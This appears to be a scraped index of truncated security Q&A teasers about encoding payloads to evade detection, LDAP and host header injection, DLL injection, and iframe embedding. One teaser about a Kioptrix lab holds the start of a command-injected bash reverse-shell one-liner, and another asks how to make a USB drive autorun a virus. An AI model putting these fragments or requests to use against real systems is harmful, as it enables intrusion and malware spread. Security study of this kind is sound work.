Collaborate Disseminate
A vulnerable website blocks almost everything that is related to PE (Privilege Escalation), but when encoding the ls -al code into a base64 format, the website doesn’t block the dangerous code (at Scan Time), will the web server detect and… Continue reading Will a Web Server detect a base64 encoded reverse shell on run time?
I read this answer, It explains how a multi-byte character exploit works in a decent way, the only way I could think of avoiding this problem is whitelisting all single-byte characters because of the fact, as D.W. mentioned in the linked a… Continue reading Multi-byte character exploit
I’m building a part of a site where users can embed Youtube videos into their profile. I’m planning to have them get the embed iframe from Youtube directly, and submit that to our server. We’re then responsible for rendering it.
For comple… Continue reading User submitted iframes – what to watch out for?
I’m trying to secure a login endpoint by attempting to bypass the login that uses LDAP.
It employs a search query of “cn=” + username + “, dc=example, dc=com” with a filter of “(objectClass=*)”.
Is an LDAP injection attack possible here … Continue reading Is an LDAP injection possible for a basic search query?
I’ve completed kioptrix level 2 challenge via sql injection, command injection, bash reverse shell, and local privilege escalation as part of my OSCP preparation.
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
; bash -i >& … Continue reading Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn’t work?
I have a MVC web Application which is hosted on IIS10. During vulnerability scanning it is noticed that the application supports Host Header Injection. The application domain allows to redirect to mallicious domain when it is intruded by … Continue reading Host header injection IIS [closed]
According to this answer, DLL injection through CreateRemoteThread in conjunction with LoadLibraryA can be prevented by hooking LoadLibraryA. I went through the effort of doing an actual implementation of both the attacking side and defend… Continue reading Why doesn’t my LoadLibraryA (LLA) hook prevent a dll injection that uses CreateRemoteThread + LLA?
Grimes and Elon Musk named their baby: X Æ A-12.
What are the risks of non-ASCII names?
For example, does the COBOL unemployment platform support non-ASCII names? Would it be possible to get a social security number (SSN) for the baby? … Continue reading Is it a good idea to use non-ASCII names in the U.S.? [closed]
How can I make a USB autorun a virus the moment it is put in a laptop?
Continue reading How can I make a flash drive autorun a virus?
I am doing a bug bounty. I intercepted the POST request to the inscription in the target website. I modified the first name and last name POST params to inject bad char (in order to SQL inject) but the API/Registration service sends me a r… Continue reading Is SerializationException sign of Serialization/Deserialization vulnerability?